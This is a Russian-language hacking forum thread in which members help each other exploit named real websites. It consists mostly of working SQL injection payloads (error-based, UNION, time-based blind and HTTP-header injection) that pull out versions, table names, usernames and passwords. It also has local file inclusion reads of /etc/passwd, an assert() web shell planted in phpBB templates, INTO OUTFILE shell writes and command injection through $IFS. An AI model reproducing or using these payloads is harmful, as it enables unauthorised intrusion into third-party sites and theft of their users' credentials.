http://mcdonalds.md/products/getallcategory?ascendent=1&category=1|2|3|4&idB=0&order=1 and updatexml(0x3a,concat(0x3a,version()),0x3a)#

XPATH syntax error: ':5.1.61'

А где можно найти подробную инфу по Error-Based и как узнать что нужно использовать данный метод?

П.С. Спасибо за быстрый ответ на прошлый вопрос.

GhostW said:
А где можно найти подробную инфу по Error-Based и как узнать что нужно использовать данный метод?
П.С. Спасибо за быстрый ответ на прошлый вопрос.


Для общего понимания:

/showpost.php?p=407227&postcount=3

для Болие детального понимания нужна понимать суть синтаксиса Mysql, т.е как правельно делоть запросы к бд и понимать как получается вывод...

День добрый. Если есть доступ к proc/self/environ%00 с вывобом user-agent возможно посмотреть phpinfo заменой агента на ? Или не должно выводить?

Artrix said:
День добрый. Если есть доступ к proc/self/environ%00 с вывобом user-agent возможно посмотреть phpinfo заменой агента на ? Или не должно выводить?


Если у Вас LFI, а не просто чтение, то конечно да!

cat1vo said:
Если у Вас LFI, а не просто чтение, то конечно да!


Да, LFI, но почему-то не выводит. В чем может быть проблема?

Нашел LFI:


http://teyla.ru/load.php?file=/etc/passwd


passwd отлично смотрится, но в ответ на


http://teyla.ru/load.php?file=/proc/self/environ


возвращается пустая страница.

Значит нет прав и нет смысла пытаться подменить user-agent?

herfleisch said:
Нашел LFI:
passwd отлично смотрится, но в ответ на
возвращается пустая страница.
Значит нет прав и нет смысла пытаться подменить user-agent?


лоооооооооооооооооооооооо оооооооол

Expl0ited said:
лоооооооооооооооооооооооо оооооооол


Что случилось?

GhostW said:
А где можно найти подробную инфу по Error-Based и как узнать что нужно использовать данный метод?
П.С. Спасибо за быстрый ответ на прошлый вопрос.


Если научится пользоваться поиском то найдем:


Expl0ited said:
Вся соль пошла отсюда: http://bugs.mysql.com/bug.php?id=32249
Где товарищ, Domas Mituzas, недоумевает, почему код

PHP:
mysql>select count(*),floor(rand()*2)x from grouptest 1 group by x;

возвращает, то верный результат, то тот же результат, но в обработчике ошибки:
Проблема в том что group by проверяет выражение несколько раз, а rand() в свою очередь возвращает каждый раз разные значение. Цитата из
мануала (http://dev.mysql.com/doc/refman/5.0/en/mathematical-functions.html#function_rand)
:
Исходя из этого некто Qwazar (
пруф (http://qwazar.ru/?p=7)
) решил попробовать конкатацию строк, для получения запрошенных данных в обработчике ошибки:

PHP:
select count(*),concat(version(),floor(rand()*2)) x from users group by x;

После нескольких попыток выполнить этот запрос, выводится:
#1062 - Duplicate entry '5.5.80' for key 'group_key'
или
#1062 - Duplicate entry '5.5.81' for key 'group_key'
Дальше для упрощения(укорочения) запроса, concat(version(),floor(rand()*2)) перенеслась в group by и мы получаем:

PHP:
select count(*)from users group by(concat(vers ion(),floor(rand()*2)));

Результат:
#1062 - Duplicate entry '5.5.80' for key 'group_key'
или
#1062 - Duplicate entry '5.5.81' for key 'group_key'
К конструкции floor(rand(0)*2)) пришли исключительно методом тыка (если я конечно не ошибаюсь). И в итоге получился вектор, для вывода информации в ошибке mysql:

PHP:
select count(*)from users group by(concat(vers ion(),floor(rand(0)*2)));

Постоянный результат:
#1062 - Duplicate entry '5.5.81' for key 'group_key'
Для удобства можно избавится от лишнего символа 1 в конце результата, использованием 0x00 - нулевой байт

PHP:
select count(*)from users group by(concat(vers ion(),0x00,floor(rand(0)*2)));

Ну и уже в виде инъекции в запросе это может выглядеть так:

Code:
bug.php?id=10+and+(select+count(*)+from+table+grou p+by(concat(version(),0x00,floor(rand(0)*2))))--+


PHP:
SELECT id,news FROM content WHERE id=10and ( select count(*)from table group by(concat(vers ion(),0x00,floor(rand(0)*2))))--

И при условии если существует таблица table, то в ответе будет:
#1062 - Duplicate entry '5.5.8' for key 'group_key'
Живой пример:

Code:
http://www.forakom.ru/tree/index.php?brand_id=739&model_id=5533&engine_id=1005635+and(select+count(*)+from+tcdView s.v_ext_engines+group+by(concat(version(),0x00,flo or(rand(0)*2))))--+

Duplicate entry '5.0.67-log' for key 1
Теперь наглядно?

herfleisch said:
Что случилось?


То что во-первых это не LFI, во вторых мозг не должен ограничиваться /proc/self/environ

Expl0ited said:
То что во-первых это не LFI


Что это если не Local File Inclusion?

Этот скрипт используется для подгрузки элементов страницы с помощью JavaScript. Каким еще макаром программист стал бы делать это, кроме как с помощью include() или require()?

Кусок кода с главной страницы ресурса:


HTML:
loadPOPUP("load.php?index="+index+"&file=lib_current.popup.php", popup_id/*'popup'*/, index);

2 herfleisch

Все же LFI. Вот код твоего файлика =)))


PHP:

Cennarios said:
Все же LFI.


В том что это LFI у меня сомнений не было, ибо


http://teyla.ru/load.php?file=index.php

Добрый вечер уважаемые.

Помогите раскрутить


http://www.cnbest.ru/?main=premises&sort=FlatTyp1&type=SALEFlats-3

s000r said:
Добрый вечер уважаемые.
Помогите раскрутить




Code:
http://www.cnbest.ru/index.php?main=news&id=100116 and 0 union select 1,2,concat_ws(0x3a,user(),database(),version())-- -

Cennarios said:
2 herfleisch
Все же LFI. Вот код твоего файлика =)))

PHP:




Серьезно, это локальный инклюд. Моя ошибка.

http://teyla.ru/load.php?file=/proc/self/fd/9&xx=phpinfo();

Люди, не могу залить шелл через шаблоны, включил Разрешить php в шаблонах: ДА

Вставляю в шаблон faq_body.html такой код:

assert(stripslashes($_REQUEST[x]));

0 Реакции.... Помогите плиз

И вообще когда я удаляю все содержимое шаблона, а потом просматриваю ничего на форуме не изменяется...

phpbb 3.0.10

OxoTnik said:
либо нет прав на редактирования шаблона, либо не тот шаблон редактируешь


Не тот шаблон редактировал, спасибо

Как можно автоматизировать sqli через X-Forwarded-For: ?

помогите найти ман по time based sql inj или покажите как крутить на примере http://www.exploit-db.com/exploits/18618/

буду рад любой помощи

вроде понял


https://rdot.org/forum/showthread.php?t=124 said:
3.4 Посимвольный перебор с помощью SLEEP Чтож про бенчмарк мы прочитали. И все обратили внимание на жуткую не стабильность этого метода. Что делать спросите вы? Вот что. С 5 ветки MySQL появился оператор SLEEP(). По сути эта функция и создает нужную нам задержку в ответе веб сервера, и, заметьте, без ненужных нагрузок на него. То есть SLEEP() является лучшей альтернативой BENCHMARK() и юзать желательно ее, но повторюсь единственный минус - эта функция появилась только аж в 5-ой ветке. Сказка, да и только. Как юзать? Все элементрано: http://xxx/news.php?id=-1' OR id= IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) -- Я юзаю значение в две - три секнуды, но вам советую подобрать его в соответствии с каналом сервера, так как могут возникнуть погрешности в выводе.

Vip77 said:
Как можно автоматизировать sqli через X-Forwarded-For: ?


Какой-нибудь плагин вроде tamper data.

Подскажите прогу/скрипт для брутфорса/дампинга blind time based mysql инъекций.

wkar said:
Подскажите прогу/скрипт для брутфорса/дампинга blind time based mysql инъекций.


чем вас не устраивает sqlmap?!

Faaax said:
чем вас не устраивает sqlmap?!


слишком крутая прога для меня

по сути я не знаю как засунуть в нее скуль такого типа:

.ru/index.php/404' AND IF((SELECT ascii(substr(table_name,1,1)) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)

Может знает кто как раскрутить


Code:
GET /ru/gaming-accessories/razer-rechargeble-lithium-ion-for-mamba-elit-naga-epic-star-wars-000010/index.html HTTP/1.1
Host: www.3ona51.com
X-Forwarded-For: "

Vip77 said:
Может знает кто как раскрутить

Code:
GET /ru/gaming-accessories/razer-rechargeble-lithium-ion-for-mamba-elit-naga-epic-star-wars-000010/index.html HTTP/1.1
Host: www.3ona51.com
X-Forwarded-For: "





PHP:
GET/ru/gaming-accessories/razer-rechargeble-lithium-ion-for-mamba-elit-naga-epic-star-wars-000010/index.html HTTP/1.1

Host:www.3ona51.com

X-Forwarded-For:127.0.0.1", 19243580, 3, 71805)on duplicate key update a=(select 1 from(select count(*),mid(version( ),rand(0)|0)x from information_schema.tables gr oup by x)a)#

MySQL[1062]: Duplicate entry '5.5.13' for key 'group_key'

cat1vo said:

PHP:
GET/ru/gaming-accessories/razer-rechargeble-lithium-ion-for-mamba-elit-naga-epic-star-wars-000010/index.html HTTP/1.1

Host:www.3ona51.com

X-Forwarded-For:127.0.0.1", 19243580, 3, 71805)on duplicate key update a=(select 1 from(select count(*),mid(version( ),rand(0)|0)x from information_schema.tables gr oup by x)a)#

MySQL[1062]: Duplicate entry '
5.5.13
' for key 'group_key'


как првильно вставить в скрипт данные, чтобы получить такой результат?

IP: ' . $_SERVER[REMOTE_ADDR].

'
User-Agent: ' . $_SERVER['HTTP_USER_AGENT'].

'
X-Forwarded-For: ' . $_SERVER['HTTP_X_FORWARDED_FOR'].

'
X-Forwarded: ' . $_SERVER['HTTP_X_FORWARDED'].

'
Forwarded-for: ' . $_SERVER['HTTP_FORWARDED_FOR'].

'
Forwarded: ' . $_SERVER['HTTP_FORWARDED'].

'
Via: ' . $_SERVER['HTTP_VIA'].

'';

echo "All headers";

echo "";

print_r($_SERVER);

echo "";

?>

Vip77 said:
Как можно автоматизировать sqli через X-Forwarded-For: ?

herfleisch said:
Какой-нибудь плагин вроде tamper data.




" if author else f"

Vip77 said:
Как можно автоматизировать sqli через X-Forwarded-For: ?

herfleisch said:
Какой-нибудь плагин вроде tamper data.




Tamper Data облегчает процесс, но не автоматизирует его. Этим вполне может заняться связка havij + php:

[PHP]
PHP:
[COLOR="#0000BB"][COLOR="#007700"]

Есть иньекция, все бы было хорошо, но имя базы содержит знак тире " - ", в итоге при from data-base.users вылазит ошибка в синтаксисе, как можно обойти?

eD"]
[R]eD said:
Есть иньекция, все бы было хорошо, но имя базы содержит знак тире " - ", в итоге при from data-base.users вылазит ошибка в синтаксисе, как можно обойти?


`data-base`.users

Вечер добрый. Допустим есть такой сайт:

http://www.site.ru/catalog/detailed/22/

Подставляю ' вылазит Mysql ошибка. Как данную уязвимость раскручивать?

Как и все остальные, разве что может получиться так, что придется делать без пробельный вариант или заменять их на /**/ например!

помогите

уязвимость вроде есть а чёт не получается дальше раскрутить

http://www.shpl.ru/shpage.php?menu=2343'

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/shpl.d2/bib/set.inc on line 159

Hapk said:
помогите
уязвимость вроде есть а чёт не получается дальше раскрутить
http://www.shpl.ru/shpage.php?menu=2343'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/shpl.d2/bib/set.inc on line 159




Code:
http://www.shpl.ru/shpage.php?menu=2343) and mid(version(),1,1)=3 and (1=1

Версия 3, тогда небыло не UNION не даже подзапросов, так что только слепые методы тебе помогут!

Как залить шелл через sqli методом error based?

Vip77 said:
Как залить шелл через sqli методом error based?


если file_priv есть, в чем проблема?

m00c0w said:
если file_priv есть, в чем проблема?


Проблем может быть куча, начиная от magic_quotes и заканчивая не знанием путей, хотя последнее чаще всего решается!

Что посоветуете?

Допустим нужно узнать привилегии но magic_quotes=on

Понимаю или чарить или хек.Вопрос пробиваю user() пишет Future_future2@localhost

Что именно тут имя юзера? Полностью или до @?И как вставить имя в хек или чар?

comynicator said:
Допустим нужно узнать привилегии но magic_quotes=on
Понимаю или чарить или хек.Вопрос пробиваю user() пишет Future_future2@localhost
Что именно тут имя юзера? Полностью или до @?И как вставить имя в хек или чар?


User - Future_future2

HEX - 0x4675747572655f66757475726532

CHAR(MySQL) - CHAR(70, 117, 116, 117, 114, 101, 95, 102, 117, 116, 117, 114, 101, 50)

cat1vo said:
User -
Future_future2
HEX -
0x4675747572655f66757475726532
CHAR(MySQL) -
CHAR(70, 117, 116, 117, 114, 101, 95, 102, 117, 116, 117, 114, 101, 50)


Спасибо за ответ.вот зачарено

http://www.site.com/fin-detail.php?id=173/**/union/**/all/**/select/**/1,file_priv,3,4,5,6,7,8,9,10,11/**/from/**/mysql.user/**/where/**/user=char(70,117,116,117,114,101,95,102,117,116,11 7,114,101,50)--

Ответ

SELECT command denied to user 'Future_future2'@'localhost' for table 'user'

Вот хек

http://www.site.com/fin-detail.php?id=173/**/union/**/all/**/select/**/1,file_priv,3,4,5,6,7,8,9,10,11/**/from/**/mysql.user/**/where/**/user=0x4675747572655f66757475726532--

ответ

SELECT command denied to user 'Future_future2'@'localhost' for table 'user'

comynicator said:
Спасибо за ответ.вот зачарено
http://www.site.com/fin-detail.php?id=173/**/union/**/all/**/select/**/1,file_priv,3,4,5,6,7,8,9,10,11/**/from/**/mysql.user/**/where/**/user=char(70,117,116,117,114,101,95,102,117,116,11 7,114,101,50)--
Ответ
SELECT command denied to user 'Future_future2'@'localhost' for table 'user'
Вот хек
http://www.site.com/fin-detail.php?id=173/**/union/**/all/**/select/**/1,file_priv,3,4,5,6,7,8,9,10,11/**/from/**/mysql.user/**/where/**/user=0x4675747572655f66757475726532--
ответ
SELECT command denied to user 'Future_future2'@'localhost' for table 'user'



А матчасть почитать сначала??? Ясно же написано что вышеуказанный пользователь не имеет прав на доступ к системной таблице mysql!

Здравствуйте, помогите, туплю. http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,group_concat(table_nam e),12,13,14,15+from+information_schema.tables+--+ есть таблица ltw_usersv4, в ней есть колонка username, пытаюсь достать ее так: http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,username,12,13,14,15+f rom+ltw_usersv4+limit+0,1+--+ и ничего не получаю. Что я делаю не так? Заранее благодарен.

FunOfGun said:
Здравствуйте, помогите, туплю.
http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,group_concat(table_nam e),12,13,14,15+from+information_schema.tables+--+
есть таблица
ltw_usersv4
, в ней есть колонка
username
, пытаюсь достать ее так:
http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,username,12,13,14,15+f rom+ltw_usersv4+limit+0,1+--+
и ничего не получаю. Что я делаю не так? Заранее благодарен.




Code:
http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,usernam e,password),12,13,14,15+from+Marketing.ltw_usersv4--+

Эта таблица находится в другой бд, в твоей ничего подобного нет. Учти другая БД - может быть другой сайт!

cat1vo said:

Code:
http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,usernam e,password),12,13,14,15+from+Marketing.ltw_usersv4--+

Эта таблица находится в другой бд, в твоей ничего подобного нет. Учти другая БД - может быть другой сайт!


Еще один глупый вопрос: как определить к какой именно базе прнадлежит таблица?

FunOfGun,


Code:
http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,table_schema,12,13,14, 15+from+information_schema.tables+where+table_name ='ltw_usersv4'+--+

FunOfGun said:
Еще один глупый вопрос: как определить к какой именно базе прнадлежит таблица?


вытаскивай просто таблицы подобными запросами:

SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’

Узнать текущую базу:

SELECT database()

http://clip2net.com/clip/m0/1358529576-clip-12kb.png Как раскрутить? Запрос был '+order+by+100

Vip77 said:
http://clip2net.com/clip/m0/1358529576-clip-12kb.png
Как раскрутить? Запрос был '+order+by+100


Т.К. url сайта Вы не даете, тогда могу только так помочь:


Code:
%')") ЗДЕСЬ ВАШ ЗАПРОС -- -

Приветствую Вас. Я хотел бы спросить, возможно ли залить шелл на XenForo версии 1.0.4? Если да, то стучите в ЛС. Или расскажите тут. Заранее благодарен)

помогите раскрутить,что то не получается

инъекция в заголовке в x-forwarded-for: 1'"


Code:
http://drive.s13.ru/?id=1

а то чё то туплю.

Залил shell на форум,открыл но там такая ситуация.

http://savepic.org/2581219.png

права на загрузку есть в папку tmp мона ли как-то оттуда потом открыть shell ? спасибо.

Помогите плиз, есть сайт при запросе page=1;ls отображает содержимое текущей директории, а вот при запросах с пробелами на пример page=1;ls -lha ничего не отображает.

Vip77 said:
Помогите плиз, есть сайт при запросе page=1;ls отображает содержимое текущей директории, а вот при запросах с пробелами на пример page=1;ls -lha ничего не отображает.


пробуй так


Code:
ls$IFS-la

Запрос:


Code:
http://www.rengl.cz/ceniky/mesto.php?id=-119'+union+select+1,'',3,4,5,6,7,8,9,10 INTO OUTFILE '/srv/http/adent.cz/rengl.cz/1.php' --+


Результат (файл rengl.cz/1.php не создается):


Code:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /srv/http/adent.cz/rengl.cz/ceniky/mesto.php on line 37

Почему?

в HEX переведи попробуй.

Может ещё быть что прав нет на корневую папку,ищи врайтабельную.

Faaax said:
в HEX переведи попробуй.


Да что вы говорите ? И из hex код исполнится ? Бред !!

можно и нужно урезать до

Попробуй.

Есть скуля, раскрутить не знаю как

_http://tagilcity.ru/component/option,com_fireboard/func,fbprofile/task,showprf'/?option=com_fireboard&func=showcat&Go=%25D0%2598%25D0%25B4%25D1%2582%25D0%25B8&catid=171

er9j6@ said:
Есть скуля, раскрутить не знаю как
_http://tagilcity.ru/component/option,com_fireboard/func,fbprofile/task,showprf'/?option=com_fireboard&func=showcat&Go=%25D0%2598%25D0%25B4%25D1%2582%25D0%25B8&catid=171




Code:
http://tagilcity.ru/index.php?option=com_fireboard'+AND+(SELECT+4662+F ROM(SELECT+COUNT(*),CONCAT(0x7e414e5449434841547e, (SELECT(CASE+WHEN+(4662=4662)+THEN+version()+ELSE+ 0+END)),0x7e414e5449434841547e,FLOOR(RAND(0)*2))x+ FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x) a)+AND+'RGKx'='RGKx&func=fbprofile&task=showprf

Найденную Вами SQL инъекцию можно сократить, т.к. запрос один и тот же, только вот первая его часть представлена как ЧПУ, а вторам с GET параметрами, собственно реализацию которой я Вам и продемонстрировал.